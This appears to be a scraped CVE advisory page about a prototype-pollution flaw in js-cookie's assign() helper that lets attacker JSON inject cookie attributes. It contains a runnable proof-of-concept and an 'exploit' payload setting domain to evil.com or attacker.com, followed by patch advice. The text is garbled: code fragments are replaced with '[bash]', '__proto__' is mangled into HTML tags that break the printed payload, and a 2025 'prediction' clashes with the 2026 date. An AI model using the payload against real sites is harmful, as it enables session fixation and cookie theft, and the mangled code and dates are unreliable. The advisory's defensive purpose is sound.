js-cookie, Prototype Pollution leading to Cookie Attribute Injection (Medium)

Listen to this Post

How the CVE works:

The vulnerability resides in js-cookie’s internal `assign()` helper (src/assign.mjs). This function copies properties from source objects into a target object using a `for…in` loop and plain assignment (target

 = source[bash]</code>). When the source object is generated via <code>JSON.parse()</code>, any `"__proto__"` key becomes an own enumerable property because JSON treats `__proto__` as a normal string key. The `for...in` loop enumerates this `"__proto__"` key, and the assignment triggers the `Object.prototype.__proto__` setter on the fresh target object (which is a plain <code>{}</code>). This per‑instance prototype hijack does not modify `Object.prototype` globally, but it makes the target object inherit attacker‑controlled properties. Later, js-cookie's `set()` function enumerates the merged attributes object with another `for...in` loop. Every key placed on the polluted prototype (e.g., <code>domain</code>, <code>secure</code>, <code>samesite</code>, <code>expires</code>, <code>path</code>) is then written into the final `Set-Cookie` string as an attribute pair. An attacker can thus override cookie attributes that the developer intended to lock down, such as forcing <code>domain=evil.com</code>, <code>secure=false</code>, or <code>samesite=None</code>, leading to cross‑site cookie injection or session fixation.

<h2 style="color: blue;">dailycve form:</h2>

Platform: js-cookie
Version: All vulnerable
Vulnerability : Prototype pollution
Severity: Medium
date: 2026-05-21

<h2 style="color: blue;">Prediction: 2025-01-15</h2>

<h2 style="color: blue;">Analytics under heading What Undercode Say:</h2>

[bash]
Environment setup and PoC execution
mkdir -p /tmp/jscookie-poc && cd /tmp/jscookie-poc
npm init -y
npm i js-cookie
PoC code (poc.mjs)
cat > poc.mjs << 'EOF'
let lastSetCookie = '';
globalThis.document = {
get cookie() { return ''; },
set cookie(v) { lastSetCookie = v; }
};
const { default: Cookies } = await import('js-cookie');
const attackerAttrs = JSON.parse(
'{"<strong>proto</strong>":{"secure":"false","domain":"evil.com","samesite":"None","expires":-1}}'
);
Cookies.set('session', 'TOKEN', attackerAttrs);
console.log('Set-Cookie that js-cookie wrote to document.cookie:');
console.log(lastSetCookie);
EOF
Run PoC
node poc.mjs

Exploit:

// Attacker-controlled JSON payload delivered via API response
const maliciousConfig = {
"<strong>proto</strong>": {
"domain": "attacker.com",
"secure": "false",
"samesite": "None",
"expires": -1,
"path": "/"
}
};
// When application passes this to Cookies.set() or Cookies.withAttributes()
Cookies.set("auth", "user_token", maliciousConfig);
// Resulting Set-Cookie: auth=user_token; domain=attacker.com; secure=false; samesite=None; path=/

Protection from this CVE

  • Upgrade js-cookie to a patched version (≥3.0.5) once available.
  • Apply the suggested patch to assign.mjs: skip __proto__, constructor, and `prototype` keys; use `Object.defineProperty` instead of direct assignment.
  • Alternative one‑liner: replace `for...in` with `for (const key of Object.getOwnPropertyNames(source)) { if (key === '__proto__') continue; target[bash] = source[bash]; }`
    - Avoid passing untrusted JSON objects directly as cookie attributes; sanitize or use `Object.create(null)` for configuration objects.

Impact

  • Attackers can hijack cookie attributes, overwriting domain, path, secure, samesite, and expires.
  • Enables session fixation by moving cookies to attacker‑controlled domains.
  • Circumvents security flags like `Secure` or SameSite=Strict, leading to potential cookie exfiltration over plain HTTP.
  • Allows persistent cookies to be turned into session cookies (expires=-1) or vice‑versa, breaking application logic.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top